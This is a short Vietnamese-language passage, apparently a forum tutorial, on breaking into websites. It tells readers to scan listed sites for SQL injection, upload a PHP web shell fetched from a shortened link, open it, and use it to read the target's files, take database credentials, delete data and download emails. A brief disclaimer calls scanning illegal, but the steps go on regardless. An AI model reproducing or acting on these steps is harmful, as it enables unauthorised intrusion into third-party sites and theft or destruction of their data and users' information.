Bước logic tiếp theo là quét các trang web được liệt kê cho lỗ hổng SQL Injection. Bạn có thể thực hiện việc này bằng cách sử dụng SQL injection thủ công hoặc các công cụ sử dụng được liệt kê trong bài viết này về SQL Injection.

Tải Shell Php.

Chúng ta sẽ không quét bất kỳ trang web nào được liệt kê vì đây là bất hợp pháp. Giả sử rằng chúng tôi đã quản lý để đăng nhập vào một trong số họ. Bạn sẽ phải tải lên trình bao PHP mà bạn đã tải xuống từ : http://shink.in/SH72D
Mở URL nơi bạn tải lên tệp dk.php.
Bạn sẽ nhận được cửa sổ sau.


( Hình ảnh chỉ mang tính chất minh họa )
Nhấp vào URL biểu tượng sẽ cho phép bạn truy cập vào các tệp trong tên miền đích.
Khi bạn đã truy cập vào các tệp tin, bạn có thể nhận được thông tin đăng nhập vào cơ sở dữ liệu và thực hiện bất cứ điều gì bạn muốn như xóa dữ liệu, tải dữ liệu như email, v.v.

<< Không Liên Quan >> : Vì mình là Quản trị viên mới nên có gì sai xót mong mọi người bỏ qua cũng như Comment cho mình biết để mình sửa kịp thời nhá.